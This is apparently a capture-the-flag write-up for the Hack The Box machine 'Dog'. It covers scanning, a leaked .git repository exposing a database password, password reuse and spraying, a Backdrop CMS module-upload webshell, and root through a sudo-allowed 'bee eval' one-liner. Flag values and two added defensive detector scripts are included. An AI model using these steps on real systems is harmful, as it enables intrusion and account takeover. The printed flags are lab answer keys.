HTB Dog - 🐧
Enumeration and Footprinting
nmap:
nmap -sC -sV -A -T4 -Pn 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 22:14 IST
Nmap scan report for 10.10.11.58
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 216.74 ms 10.10.14.1
2 218.53 ms 10.10.11.58
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.03 seconds
dirsearch:
dirsearch -u http://10.10.11.58
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/d31ty/Downloads/HTB/reports/http_10.10.11.58/_25-03-17_22-15-12.txt
Target: http://10.10.11.58/
[22:15:12] Starting:
[22:15:27] 301 - 309B - /.git -> http://10.10.11.58/.git/
[22:15:27] 200 - 604B - /.git/
[22:15:27] 200 - 95B - /.git/COMMIT_EDITMSG
[22:15:27] 200 - 92B - /.git/config
[22:15:27] 200 - 73B - /.git/description
[22:15:27] 200 - 23B - /.git/HEAD
[22:15:27] 200 - 409B - /.git/branches/
[22:15:27] 200 - 230B - /.git/logs/refs/heads/master
[22:15:27] 301 - 319B - /.git/logs/refs -> http://10.10.11.58/.git/logs/refs/
[22:15:27] 301 - 325B - /.git/logs/refs/heads -> http://10.10.11.58/.git/logs/refs/heads/
[22:15:28] 200 - 650B - /.git/hooks/
[22:15:27] 200 - 476B - /.git/logs/
[22:15:27] 200 - 240B - /.git/info/exclude
[22:15:28] 200 - 455B - /.git/info/
[22:15:27] 200 - 230B - /.git/logs/HEAD
[22:15:28] 301 - 320B - /.git/refs/heads -> http://10.10.11.58/.git/refs/heads/
[22:15:28] 200 - 41B - /.git/refs/heads/master
[22:15:28] 200 - 461B - /.git/refs/
[22:15:28] 301 - 319B - /.git/refs/tags -> http://10.10.11.58/.git/refs/tags/
[22:15:28] 200 - 2KB - /.git/objects/
[22:15:30] 403 - 276B - /.htaccess.bak1
[22:15:30] 403 - 276B - /.htaccess.sample
[22:15:30] 403 - 276B - /.htaccess.save
[22:15:30] 403 - 276B - /.htaccess_orig
[22:15:31] 403 - 276B - /.html
[22:15:31] 403 - 276B - /.htm
[22:15:31] 403 - 276B - /.htpasswd_test
[22:15:31] 200 - 337KB - /.git/index
[22:15:31] 403 - 276B - /.htaccessBAK
[22:15:31] 403 - 276B - /.htaccess.orig
[22:15:31] 403 - 276B - /.httr-oauth
[22:15:31] 403 - 276B - /.htaccessOLD
[22:15:31] 403 - 276B - /.htaccess_extra
[22:15:31] 403 - 276B - /.htpasswds
[22:15:31] 403 - 276B - /.htaccess_sc
[22:15:31] 403 - 276B - /.htaccessOLD2
[22:15:31] 403 - 276B - /.ht_wsr.txt
[22:15:37] 403 - 276B - /.php
[22:16:55] 301 - 309B - /core -> http://10.10.11.58/core/
[22:17:14] 301 - 310B - /files -> http://10.10.11.58/files/
[22:17:15] 200 - 595B - /files/
[22:17:26] 200 - 4KB - /index.php
[22:17:27] 404 - 2KB - /index.php/login/
[22:17:34] 200 - 456B - /layouts/
[22:17:35] 200 - 7KB - /LICENSE.txt
[22:17:46] 301 - 312B - /modules -> http://10.10.11.58/modules/
[22:17:46] 200 - 399B - /modules/
[22:18:11] 200 - 5KB - /README.md
[22:18:14] 200 - 528B - /robots.txt
[22:18:17] 403 - 276B - /server-status
[22:18:17] 403 - 276B - /server-status/
[22:18:18] 200 - 0B - /settings.php
[22:18:22] 301 - 310B - /sites -> http://10.10.11.58/sites/
[22:18:30] 301 - 311B - /themes -> http://10.10.11.58/themes/
[22:18:30] 200 - 454B - /themes/
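Added example (not from the writeup): a small Python detector that runs over constructed Apache access-log lines and flags, from the server side, what the nmap http-git script and the dirsearch run above leave behind: a client that is actually served files under /.git/, and a burst of dotfile probes. The log lines, client addresses and byte counts are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log line; the request timestamp uses Apache's default format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Dotfile paths that should never be reachable over HTTP (.git is what nmap/dirsearch hit above).
SENSITIVE_RE = re.compile(r"^/\.git(/|$)|^/\.(ht|env|svn)")

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "path": m["path"].split("?", 1)[0],
            "status": int(m["status"]), "ts": datetime.strptime(m["ts"], TS_FMT)}

def detect(lines, probe_threshold=5, window=timedelta(seconds=60)):
    """Flag clients that were actually served .git content, or that burst-probed dotfiles."""
    per_ip = defaultdict(lambda: {"git": set(), "probes": []})
    for rec in filter(None, map(parse_line, lines)):
        if rec["path"].startswith("/.git") and rec["status"] in (200, 301):
            per_ip[rec["ip"]]["git"].add(rec["path"])      # repository really is exposed
        if SENSITIVE_RE.match(rec["path"]):
            per_ip[rec["ip"]]["probes"].append(rec["ts"])  # 403s count too: it is scanning
    findings = {}
    for ip, d in per_ip.items():
        times, burst, j = sorted(d["probes"]), 0, 0
        for i, t in enumerate(times):            # sliding window over probe timestamps
            while times[j] < t - window:
                j += 1
            burst = max(burst, i - j + 1)
        if d["git"] or burst >= probe_threshold:
            findings[ip] = {"git_exposed": sorted(d["git"]), "probe_burst": burst}
    return findings

# Constructed sample lines (client IPs and sizes are made up); mirrors the dirsearch run above.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Mar/2025:22:15:27 +0530] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "dirsearch"
198.51.100.7 - - [17/Mar/2025:22:15:27 +0530] "GET /.git/config HTTP/1.1" 200 92 "-" "dirsearch"
198.51.100.7 - - [17/Mar/2025:22:15:30 +0530] "GET /.htaccess.bak1 HTTP/1.1" 403 276 "-" "dirsearch"
198.51.100.7 - - [17/Mar/2025:22:15:30 +0530] "GET /.htaccess.sample HTTP/1.1" 403 276 "-" "dirsearch"
198.51.100.7 - - [17/Mar/2025:22:15:31 +0530] "GET /.htpasswd_test HTTP/1.1" 403 276 "-" "dirsearch"
198.51.100.9 - - [17/Mar/2025:22:16:02 +0530] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, f in detect(SAMPLE_LOG).items():
        print(ip, f)
```

On the server the fix is to not deploy the .git directory at all, or to deny it in Apache (for example a `<DirectoryMatch "/\.git/">` block with `Require all denied`).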
.git enumeration
Honestly this enumeration sucks for an easy machine, as there are so many git files and it is a rabbit hole to find info.
But this is how it will be in the real world :D So it's a skill. If anyone knows a better way to enumerate, please ping me on Discord: .d31ty
settings.php
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
$database_prefix = '';
$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';
/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json
┌──(d31ty㉿kali)-[~/…/0-8204779c764abd4c9d8d95038b6d22b6a7515afa/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active]
└─$ cat update.settings.json
{
"_config_name": "update.settings",
"_config_static": true,
"update_cron": 1,
"update_disabled_extensions": 0,
"update_interval_days": 0,
"update_url": "",
"update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22",
"update_max_attempts": 2,
"update_timeout": 30,
"update_emails": [
"tiffany@dog.htb"
],
"update_threshold": "all",
"update_requirement_type": 0,
"update_status": [],
"update_projects": []
}
“tiffany@dog.htb”
core/modules/system/system.info
/…/0-8204779c764abd4c9d8d95038b6d22b6a7515afa/core/modules/system]
└─$ cat system.info
type = module
name = System
description = Handles general site configuration for administrators.
package = System
version = BACKDROP_VERSION
backdrop = 1.x
required = TRUE
configure = admin/config/system
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
User found: tiffany
Fortunately the login page accepted the same password for tiffany: BackDropJ2024DS2024
Found this: '# Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)' (PoC link). Create shell.tar.gz (other file types like .zip are not supported), upload it in the browser and install it using manual installation.
Once installed, the shell can be accessed at /modules/shell/shell.php. Boom!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
This may sound hilarious, but it really is that simple: try password spraying for all the users. New users found: jobert and johncusack
Password tried: BackDropJ2024DS2024
Logged in as: johncusack
User flag: dfb0b868b301969bf41b0da38843f079
Privilege Escalation
johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
So /usr/local/bin/bee seems to be the CLI for Backdrop CMS. By running cat on it and using -h we can see how to leverage it.
Out of all the commands, eval looks interesting:
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
So I tried this command:
johncusack@dog:~$ /usr/local/bin/bee eval 'system("/bin/bash")'
✘ The required bootstrap level for 'eval' is not ready.
But it seems that the bootstrap needs write access to run the command, so we need to find a path where we can write; of course the base web path '/var/www/html' is writable by default.
To confirm this:
johncusack@dog:/tmp$ sudo /usr/local/bin/bee --root=/tmp eval 'system("/bin/bash")'
✘ The required bootstrap level for 'eval' is not ready.
So this is my understanding.
The root command: johncusack@dog:/tmp$ sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash")'
Pwned!
Root flag: b20ecca6e74f0e75a26f1911a16e6ddd
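Added example (not from the writeup): a Python audit helper that parses `sudo -l` output like the one above and flags rules that hand a code-evaluating CLI to a user without argument restrictions. The list of such binaries is an assumption, with bee on it because of the eval subcommand shown above; the second rule in the sample is constructed for contrast.

```python
import re

# Shape of a rule line in `sudo -l` output: "(runas) [TAG: ...] command [args]".
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Assumed list of binaries whose ordinary subcommands run caller-supplied code; `bee` is on it
# because its `eval` subcommand executes arbitrary PHP after bootstrapping Backdrop, as shown above.
CODE_EXEC_BINS = {"bee", "drush", "php", "python3", "perl", "ruby", "bash", "sh", "vim", "env"}

def audit_rule(rule):
    """Return {"runas", "command", "issues"} for one rule, or None if the line is not a rule."""
    m = RULE_RE.search(rule.strip())
    if not m:
        return None
    tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
    cmd = m["cmd"].strip()
    argv = cmd.split()
    binary = argv[0].rsplit("/", 1)[-1]
    issues = []
    if cmd == "ALL":
        issues.append("unrestricted ALL: equivalent to a root shell")
    elif binary in CODE_EXEC_BINS and len(argv) == 1:
        issues.append(f"{binary} with no argument restriction: any subcommand, including eval, runs as root")
    elif binary in CODE_EXEC_BINS:
        issues.append(f"{binary} with pinned args: verify the pinned subcommand cannot evaluate code")
    if "NOPASSWD" in tags:
        issues.append("NOPASSWD")
    return {"runas": m["runas"].strip(), "command": cmd, "issues": issues}

def audit_sudo_l(output):
    """Audit the command section of `sudo -l` output; returns only rules with issues."""
    findings, in_cmds = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
        elif in_cmds and line.strip().startswith("("):
            r = audit_rule(line)
            if r and r["issues"]:
                findings.append(r)
    return findings

# The writeup's own bee rule, plus one constructed tightly scoped rule that should pass.
SUDO_L = """\
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
    (root) /usr/bin/systemctl restart apache2
"""
```

A rule that grants a CMS CLI as root should pin the subcommand and its arguments, and still avoid eval-like ones; granting the bare binary is the same as granting a root shell.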
My rank after this machine: #821 25.4% towards Pro Hacker 26.35% of Hack The Box Pwned